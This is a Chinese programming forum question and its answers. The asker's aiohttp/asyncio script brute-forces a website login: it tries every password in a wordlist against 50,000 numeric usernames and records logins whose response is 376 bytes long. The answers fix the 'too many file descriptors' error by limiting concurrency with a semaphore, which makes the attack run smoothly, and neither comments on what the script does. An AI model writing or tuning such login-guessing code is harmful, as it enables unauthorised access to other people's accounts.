python的aiohttp错误提示

用aiohttp和asyncio构建的网络爬虫如果url太多,出现错误提示:ValueError: too many file descriptors in select()

import aiohttp
import asyncio
import time
timeclock=time.clock()
pwd_all=[]
with open("pwd.txt","r+",encoding='utf-8') as fob:
    for b in fob.readlines():
        pwd_all.append(b.strip())
oklist=[]
async def hello(name):
    async with aiohttp.ClientSession() as session:
        for pwd in pwd_all:
            payload={'name':name,'password':pwd}
            async with session.post('http://www.xxxxxxx.com',data=payload) as resp:
                backdata=await resp.text()
                if len(backdata)==376:
                    oklist.append("{}:{}".format(name,pwd))
                    break
loop = asyncio.get_event_loop()
tasks = [hello(str(uname)) for uname in range(10000,60000)]
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
print(oklist)
print("time is:"+str(time.clock()-timeclock))

错误信息

阅读 59.7k
2 个回答

tasks = [hello(str(uname)) for uname in range(10000,12000)]
先改小一点,一上来就5万个,扯着蛋了~

在windows环境下,最多只能1024个线程,多了就报错,asyncio调用底层的select(),所以,最好控制下您的线程数量。
当然您也可以使用线程池asyncio.Semaphore(number),就像这样:

async def hello(name):
    async with sem:
    '''
    your code ....
    '''
sem = asyncio.Semaphore(10) # 协程池数量
tasks = [asyncio.ensure_future(hello(str(uname))) for uname in range(10000,60000)]
loop.run_until_complete(asyncio.gather(*tasks))
撰写回答
你尚未登录,登录后可以
  • 和开发者交流问题的细节
  • 关注并接收问题和回答的更新提醒
  • 参与内容的编辑和改进,让解决方法与时俱进